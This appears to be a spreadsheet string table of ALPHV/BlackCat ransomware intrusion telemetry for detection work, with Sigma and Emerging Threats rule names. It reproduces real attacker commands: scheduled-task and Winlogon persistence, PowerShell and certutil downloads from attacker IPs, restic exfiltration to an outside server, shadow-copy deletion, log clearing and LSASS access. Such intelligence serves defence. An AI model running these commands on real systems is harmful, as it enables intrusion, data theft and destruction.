  <si>
    <t>schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /sc MINUTE /mo 720 /F</t>
  </si>
  <si>
    <t>schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /sc MINUTE /mo 720 /F</t>
  </si>
  <si>
    <t>schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE</t>
  </si>
  <si>
    <t>schtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE</t>
  </si>
  <si>
    <t>cmd.exe /C reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\users\[REDACTED]\appdata\local\notepad\UpdateEdge.bat</t>
  </si>
  <si>
    <t>pythonw.exe renamed to setup.exe</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>{"object": "process_create", "proces_command_line": r''' c:\Windows\system32\cmd.exe /C rename pythonw.exe UpdateJson.exe''', "initiating_process_command_line": "winlogon.exe", "initiating_process_name": "winlogon.exe"}</t>
  </si>
  <si>
    <t>bcdedit /set {default} safeboot network</t>
  </si>
  <si>
    <t>net group "domain admins" /domain</t>
  </si>
  <si>
    <t>{"object": "process_access", "source_process_path": "c:\windows\system32\gpupdate.exe", "target_process_path": "c:\Windows\system32\lsass.exe", "access": "0x1fffff"}</t>
  </si>
  <si>
    <t>ipconfig /all</t>
  </si>
  <si>
    <t>nltest /domain_trusts</t>
  </si>
  <si>
    <t>nltest-pid</t>
  </si>
  <si>
    <t>net localgroup administrators</t>
  </si>
  <si>
    <t>net group "Domain Computers" /domain</t>
  </si>
  <si>
    <t>cmd.exe /C net group "Domain controllers" /DOMAIN</t>
  </si>
  <si>
    <t>cmd.exe /C net group "domain admins" /DOMAIN</t>
  </si>
  <si>
    <t>cmd.exe /C net localgroup Administrators</t>
  </si>
  <si>
    <t>cmd.exe /C net group /Domain</t>
  </si>
  <si>
    <t>cmd.exe /C net group "Domain Computers" /DOMAIN</t>
  </si>
  <si>
    <t>PowerView</t>
  </si>
  <si>
    <t>IEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread 50</t>
  </si>
  <si>
    <t>pshell-pid, powerview-pid</t>
  </si>
  <si>
    <t>powerview-pid</t>
  </si>
  <si>
    <t>winlogon &gt; 3389 RDP</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c cd c:\windows\adfs\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c cd mkdir py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c cd  py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' curl -k https://91.92.245.26/python.zip ''', "initiating_process_command_line": "cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip -DestinationPath c:\windows\adfs\py\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t xml:space="preserve"> {"object": "process_create", "process_command_line": r''' powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip  -DestinationPath c:\windows\adfs\py\ ''', "initiating_process_command_line": " cmd.exe /Q /c powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip -DestinationPath c:\windows\adfs\py\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c  /cd dir 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r'''pythonw.exe wo12.py  ''', "initiating_process_command_line": "cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r'''c:\windows\system32\cmd.exe ''', "initiating_process_command_line": "pythonw.exe wo12.py"}</t>
  </si>
  <si>
    <t>{"object": "winevtx_4624", "logon_type": "9", "logon_process": "seclogo", "</t>
  </si>
  <si>
    <t>cobalt strike config</t>
  </si>
  <si>
    <t>"HTTP/1.1 307 Temporary Redirect" &amp;&amp; "Content-Type: text/html; charset=utf-8" &amp;&amp; "Location: https://www.cloudflare.com/" &amp;&amp; "Content-Length: 63" &amp;&amp; port="81" &amp;&amp; protocol="http"</t>
  </si>
  <si>
    <t>restic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt</t>
  </si>
  <si>
    <t>restic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup "F:\Shares\&lt;REDACTED&gt;\&lt;REDACTED&gt;"</t>
  </si>
  <si>
    <t>restic</t>
  </si>
  <si>
    <t>cmd.exe /C PsExec64.exe -accepteula \\&lt;DOMAIN-CONTROLLER-IP&gt; -c -f -d -s up.bat</t>
  </si>
  <si>
    <t>net  user REDACTED JapanNight!128 /domain</t>
  </si>
  <si>
    <t>cmd.exe /C for /f %a in (pc.txt) do copy /y \\&lt;REDACTED&gt;\c$\&lt;REDACTED&gt;.exe \\%a\c$\&lt;REDACTED&gt;.exe</t>
  </si>
  <si>
    <t>cmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat</t>
  </si>
  <si>
    <t>bcdedit  /set {default} safeboot network</t>
  </si>
  <si>
    <t xml:space="preserve">findstr  /C:"The operation completed successfully." </t>
  </si>
  <si>
    <t xml:space="preserve">reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c C:\&lt;REDACTED-COMPANY-NAME&gt;.exe" /f 
findstr  /C:"The operation completed successfully." </t>
  </si>
  <si>
    <t>reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d &lt;REDACTED-DOMAIN-NAME&gt;\backup2 /f</t>
  </si>
  <si>
    <t>reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d JapanNight!128 /f</t>
  </si>
  <si>
    <t>reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /d Service"</t>
  </si>
  <si>
    <t>C:\Windows\System32\cmd.exe "cmd" /c "bcdedit /set {current} safeboot network"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\15991160457623399845550968347370640942 /f"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /f"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "sc delete 15991160457623399845550968347370640942"</t>
  </si>
  <si>
    <t>C:\Windows\System32\cmd.exe "cmd" /c "bcdedit /deletevalue {current} safeboot"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "wmic csproduct get UUID"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "iisreset.exe /stop"</t>
  </si>
  <si>
    <t>C:\Windows\System32\cmd.exe "cmd" /c "vssadmin.exe Delete Shadows /all /quiet"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "arp -a"</t>
  </si>
  <si>
    <t>C:\Windows\System32\cmd.exe "cmd" /c "wmic.exe Shadowcopy Delete"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "wevtutil.exe el"</t>
  </si>
  <si>
    <t>C:\Windows\SysWOW64\cmd.exe "cmd" /c "wevtutil.exe cl &lt;MULTIPLE EVENT LOGS&gt;</t>
  </si>
  <si>
    <t>934fa692-f2fa-4465-8bb3-ee1d4c0718cc : Enabling Safeboot with BCDEDIT
181f510b-0b3c-4e05-939c-7623a4a9c82c : Execution of Python Scripts in AppData Directory
6f77de5c-27af-435b-b530-e2d07b77a980 : Impacket Tool Execution
d2722770-3295-478e-bd58-c3c18baaa821 : Modification of UserInit Registry Value
3f684d2e-4760-4db9-a578-3698e21a01d5 : Modification of UserInit Registry Value
2249fc47-1825-4137-b9ce-aa65749bb68c : Restic Backup Tool Misuse</t>
  </si>
  <si>
    <t>sigma_dfir</t>
  </si>
  <si>
    <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE</t>
  </si>
  <si>
    <t>968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity</t>
  </si>
  <si>
    <t>8d5aca11-22b3-4f22-b7ba-90e60533e1fb : Wmiexec Default Output File</t>
  </si>
  <si>
    <t>526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE</t>
  </si>
  <si>
    <t>7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools</t>
  </si>
  <si>
    <t>42c575ea-e41e-41f1-b248-8093c3e82a28 : PsExec Service Installation</t>
  </si>
  <si>
    <t>8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2</t>
  </si>
  <si>
    <t>192a0330-c20b-4356-90b6-7b7049ae0b8 : Successful Overpass the Hash Attempt</t>
  </si>
  <si>
    <t>d7662ff6-9e97-4596-a61d-9839e32dee8d : Add SafeBoot Keys Via Reg Utility</t>
  </si>
  <si>
    <t>cc36992a-4671-4f21-a91d-6c2b72a2edf5 : Suspicious Eventlog Clearing or Configuration Change Activity</t>
  </si>
  <si>
    <t>c947b146-0abc-4c87-9c64-b17e9d7274a2 : Shadow Copies Deletion Using Operating Systems Utilities</t>
  </si>
  <si>
    <t>dcd74b95-3f36-4ed9-9598-0490951643aa : PowerView PowerShell Cmdlets - ScriptBlock</t>
  </si>
  <si>
    <t>sigma</t>
  </si>
  <si>
    <t>ETPRO JA3 Hash - Possible Ligolo Server/Golang Binary Response
ET USER_AGENTS Go HTTP Client User-Agent
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB Executable File Transfer
ET POLICY PsExec service created
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement
ET POLICY Powershell Activity Over SMB - Likely Lateral Movement
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET INFO Suspected Impacket WMIExec Activity
ET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection
ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check
ETPRO USER_AGENTS Observed Suspicious UA (Mozilla/5.0)</t>
  </si>
  <si>
    <t>etpro</t>
  </si>
  <si>
    <t>alphv-eid0129</t>
  </si>
  <si>
    <t>alphv-eid0130</t>
  </si>
  <si>
    <t>alphv-eid0131</t>
  </si>
  <si>
    <t>alphv-eid0132</t>
  </si>
  <si>
    <t>alphv-eid0133</t>
  </si>
  <si>
    <t>alphv-eid0134</t>
  </si>
  <si>
    <t>alphv-eid0135</t>
  </si>
  <si>
    <t>alphv-eid0136</t>
  </si>
  <si>
    <t>alphv-eid0137</t>
  </si>
  <si>
    <t>alphv-eid0138</t>
  </si>
  <si>
    <t>alphv-eid0139</t>
  </si>
  <si>
    <t>alphv-eid0140</t>
  </si>
  <si>
    <t>alphv-eid0141</t>
  </si>
  <si>
    <t>alphv-eid0142</t>
  </si>
  <si>
    <t>alphv-eid0143</t>
  </si>
  <si>
    <t>alphv-eid0144</t>
  </si>
  <si>
    <t>alphv-eid0145</t>
  </si>
  <si>
    <t>alphv-eid0146</t>
  </si>
  <si>
    <t>alphv-eid0147</t>
  </si>
  <si>
    <t>alphv-eid0148</t>
  </si>
  <si>
    <t>alphv-eid0149</t>
  </si>
  <si>
    <t>alphv-eid0150</t>
  </si>
  <si>
    <t>alphv-eid0151</t>
  </si>
  <si>
    <t>alphv-eid0152</t>
  </si>
  <si>
    <t>alphv-eid0153</t>
  </si>
  <si>
    <t>alphv-eid0154</t>
  </si>
  <si>
    <t>alphv-eid0155</t>
  </si>
  <si>
    <t>alphv-eid0156</t>
  </si>
  <si>
    <t>alphv-eid0157</t>
  </si>
  <si>
    <t>alphv-eid0158</t>
  </si>
  <si>
    <t>alphv-eid0159</t>
  </si>
  <si>
    <t>alphv-eid0160</t>
  </si>
  <si>
    <t>alphv-eid0161</t>
  </si>
  <si>
    <t>alphv-eid0162</t>
  </si>
  <si>
    <t>alphv-eid0163</t>
  </si>
  <si>
    <t>alphv-eid0164</t>
  </si>
  <si>
    <t>alphv-eid0165</t>
  </si>
  <si>
    <t>alphv-eid0166</t>
  </si>
  <si>
    <t>alphv-eid0167</t>
  </si>
  <si>
    <t>alphv-eid0168</t>
  </si>
  <si>
    <t>alphv-eid0169</t>
  </si>
  <si>
    <t>alphv-eid0170</t>
  </si>
  <si>
    <t>alphv-eid0171</t>
  </si>
  <si>
    <t>alphv-eid0172</t>
  </si>
  <si>
    <t>alphv-eid0173</t>
  </si>
  <si>
    <t>alphv-eid0174</t>
  </si>
  <si>
    <t>alphv-eid0175</t>
  </si>
  <si>
    <t>alphv-eid0176</t>
  </si>
  <si>
    <t>alphv-eid0177</t>
  </si>
  <si>
    <t>alphv-eid0178</t>
  </si>
  <si>
    <t>alphv-eid0179</t>
  </si>
  <si>
    <t>alphv-eid0180</t>
  </si>
  <si>
    <t>alphv-eid0181</t>
  </si>
  <si>
    <t>alphv-eid0182</t>
  </si>
  <si>
    <t>alphv-eid0183</t>
  </si>
  <si>
    <t>alphv-eid0184</t>
  </si>
  <si>
    <t>alphv-eid0185</t>
  </si>
  <si>
    <t>alphv-eid0186</t>
  </si>
  <si>
    <t>alphv-eid0187</t>
  </si>
  <si>
    <t>alphv-eid0188</t>
  </si>
  <si>
    <t>alphv-eid0189</t>
  </si>
  <si>
    <t>alphv-eid0190</t>
  </si>
  <si>
    <t>alphv-eid0191</t>
  </si>
  <si>
    <t>alphv-eid0192</t>
  </si>
  <si>
    <t>alphv-eid0193</t>
  </si>
  <si>
    <t>alphv-eid0194</t>
  </si>
  <si>
    <t>alphv-eid0195</t>
  </si>
  <si>
    <t>alphv-eid0196</t>
  </si>
  <si>
    <t>alphv-eid0197</t>
  </si>
  <si>
    <t>alphv-eid0198</t>
  </si>
  <si>
    <t>alphv-eid0199</t>
  </si>
  <si>
    <t>alphv-eid0200</t>
  </si>
  <si>
    <t>alphv-eid0201</t>
  </si>
  <si>
    <t>alphv-eid0202</t>
  </si>
  <si>
    <t>alphv-eid0203</t>
  </si>
  <si>
    <t>alphv-eid0204</t>
  </si>
  <si>
    <t>alphv-eid0205</t>
  </si>
  <si>
    <t>alphv-eid0206</t>
  </si>
  <si>
    <t>alphv-eid0207</t>
  </si>
  <si>
    <t>alphv-eid0208</t>
  </si>
  <si>
    <t>alphv-eid0209</t>
  </si>
  <si>
    <t>alphv-eid0210</t>
  </si>
  <si>
    <t>alphv-eid0211</t>
  </si>
  <si>
    <t>alphv-eid0212</t>
  </si>
  <si>
    <t>alphv-eid0213</t>
  </si>
  <si>
    <t>alphv-eid0214</t>
  </si>
  <si>
    <t>alphv-eid0215</t>
  </si>
  <si>
    <t>alphv-eid0216</t>
  </si>
  <si>
    <t>alphv-eid0217</t>
  </si>
  <si>
    <t>alphv-eid0218</t>
  </si>
  <si>
    <t>alphv-eid0219</t>
  </si>
  <si>
    <t>alphv-eid0220</t>
  </si>
  <si>
    <t>alphv-eid0221</t>
  </si>
  <si>
    <t>alphv-eid0222</t>
  </si>
  <si>
    <t>alphv-eid0223</t>
  </si>
  <si>
    <t>alphv-eid0224</t>
  </si>
  <si>
    <t>alphv-eid0225</t>
  </si>
  <si>
    <t>alphv-eid0226</t>
  </si>
  <si>
    <t>alphv-eid0227</t>
  </si>
  <si>
    <t>alphv-eid0228</t>
  </si>
  <si>
    <t>alphv-eid0229</t>
  </si>
  <si>
    <t>alphv-eid0230</t>
  </si>
  <si>
    <t>alphv-eid0231</t>
  </si>
  <si>
    <t>alphv-eid0232</t>
  </si>
  <si>
    <t>alphv-eid0233</t>
  </si>
  <si>
    <t>alphv-eid0234</t>
  </si>
  <si>
    <t>alphv-eid0235</t>
  </si>
  <si>
    <t>alphv-eid0236</t>
  </si>
  <si>
    <t>alphv-eid0237</t>
  </si>
  <si>
    <t>alphv-eid0238</t>
  </si>
  <si>
    <t>{ "data": "2024-06", "url": "https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "r''' "c:\windows\system32\wscript.exe" C:\users\&lt;&gt;\ApData\Local\Temp\&lt;&gt;.zip\Document[2023.10.11_08-07].vbs" ''', "initiating_process_command_line": r''' C:\windows\Explorer.exe'''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "r''' "c:\windows\system32\regsvr32.exe" c:\windows\temp\03070-1.dll ''', "initiating_process_command_line": r''' "c:\windows\system32\wscript.exe" C:\users\&lt;&gt;\ApData\Local\Temp\&lt;&gt;.zip\Document[2023.10.11_08-07].vbs"'''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "r''' cmd /c rundll32.exe c:\Users\&lt;&gt;\AppDataRoaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1''', "initiating_process_command_line": r''' "c:\windows\system32\regsvr32.exe" c:\windows\temp\03070-1.dll '''}</t>
  </si>
  <si>
    <t>c:\windows\system32\msiexec.exe /I %LOCALAPPDATA%\TEMP\setup.msi</t>
  </si>
  <si>
    <t>wmiexec.py</t>
  </si>
  <si>
    <t>impacket</t>
  </si>
  <si>
    <t>c:\Program Files (x86)\ScreenConnect Client (82d6a046a146cb1)\screenconnect.clientservice.exe</t>
  </si>
  <si>
    <t>bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\210bd2ae-32f2-43e6-8e64-09d61ff22ec1run.cmd" '''}</t>
  </si>
  <si>
    <t>certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe</t>
  </si>
  <si>
    <t>certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscs.exe</t>
  </si>
  <si>
    <t>certutil -urlcache -split -f http://&lt;IP&gt;:80/download/csss.exe C:\programdata\cscs.exe</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscs.exe ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''certutil -urlcache -split -f http://&lt;IP&gt;:80/download/csss.exe C:\programdata\cscs.exe ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaid'))" ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''powershell invoke-webrequest 'http://temp.sh/VSIAV/http64.exe" -OutFile C:programdata\rr.exe''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>powershell Invoke-WebRequest "http://temp.sh/VSlAV/http64.exe" -OutFile C:\programdata\rr.exe</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksajSK'))" ''', "intiating_process_command_line": r''' cmd /c "C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' c:\windows\system32\rundll32.exe ''', "intiating_process_command_line": r''' powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' c:\windows\system32\cmd.exe /c regsvr32.exe https64.dll,Start ''', "intiating_process_command_line": r''' powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' c:\windows\system32\cmd.exe /c regsvr32 https64.dll,Start ''', "intiating_process_command_line": r''' powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))" '''}</t>
  </si>
  <si>
    <t xml:space="preserve">\postex_22a3 </t>
  </si>
  <si>
    <t>defualt pipe name</t>
  </si>
  <si>
    <t>impacket wmiexec.py</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd c/programdata 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd goat.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c quser 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd dir1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c db.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c del db.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c del sp.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /Q /c sp.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>csharpstreamer used</t>
  </si>
  <si>
    <t>inject into winlogon.exe</t>
  </si>
  <si>
    <t>inject into rundll32</t>
  </si>
  <si>
    <t>NtAllocateVirtualMemoryRemoteApiCall</t>
  </si>
  <si>
    <t>{"object": "NtAllocateVirtualMemory", "process_name": r''' rundll32.exe ''', "intiating_process_command_line": r''' powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))" '''}</t>
  </si>
  <si>
    <t>{"object": "NtAllocateVirtualMemory", "process_name": r''' winlogon.exe ''', "intiating_process_command_line": r''' powershell.exe -nop -w hidden -c " IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))" '''}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c del db.exe 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object":  "process_create", "process_command_line": r''' cmd.exe /Q /c del sp.exe 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', "initiating_process_command_line": "c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"}</t>
  </si>
  <si>
    <t>{"object": "process_access", "source_process_path": "c:\Tools\cslite.exe", "target_process_path": "c:\Windows\system32\lsass.exe", "access": "0x1010"}</t>
  </si>
  <si>
    <t xml:space="preserve">UNKNOWN Call Trace </t>
  </si>
  <si>
    <t>Another data point to look for is the UNKNOWN string in the CallTrace, which indicates Sysmon was not able to resolve the address of code from where the OpenProcessfunction was called, potential indication of a DLL in memory.</t>
  </si>
  <si>
    <t>In another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should happen rarely in a production environment, and once again, the CallTrace can also help as CallTrace with ntdll.dll, dbghelp.dll or dbgcore.dll</t>
  </si>
  <si>
    <t>dcsync</t>
  </si>
  <si>
    <t>cmd.exe /c chcp &gt;&amp;2</t>
  </si>
  <si>
    <t>certutil-pid</t>
  </si>
  <si>
